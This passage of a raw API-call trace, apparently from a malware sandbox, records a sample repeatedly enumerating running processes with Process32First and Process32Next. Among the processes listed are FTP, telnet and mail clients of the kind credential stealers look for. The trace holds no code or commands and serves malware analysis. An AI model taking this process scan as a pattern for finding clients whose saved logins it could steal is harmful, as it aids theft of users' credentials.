lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0257.005] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0257.006] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0257.012] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0257.014] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0257.018] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0257.019] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0257.021] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0257.022] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0257.024] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0257.026] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0257.027] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0257.029] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0257.031] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0257.032] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0257.034] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0257.036] CloseHandle (hObject=0x2338) returned 1 [0257.036] Sleep (dwMilliseconds=0x64) [0257.065] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0257.120] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.121] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0257.123] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0257.124] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0257.126] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0257.128] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0257.129] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0257.131] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0257.132] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0257.134] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.135] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.137] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0257.139] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.140] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.142] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.182] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.184] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.185] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.187] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.189] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0257.235] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0257.237] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.238] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0257.240] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.242] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0257.244] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0257.326] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0257.328] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0257.330] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0257.332] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0257.335] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.336] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0257.338] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0257.340] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0257.341] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0257.343] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.344] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0257.374] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0257.375] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0257.377] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0257.378] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0257.380] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0257.381] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0257.383] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0257.388] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0257.389] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0257.391] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0257.392] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0257.394] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0257.395] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0257.397] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0257.399] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0257.400] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0257.402] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0257.406] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0257.407] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0257.409] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0257.410] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0257.412] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0257.441] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0257.443] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0257.445] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0257.446] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0257.448] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0257.450] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0257.452] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0257.454] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, 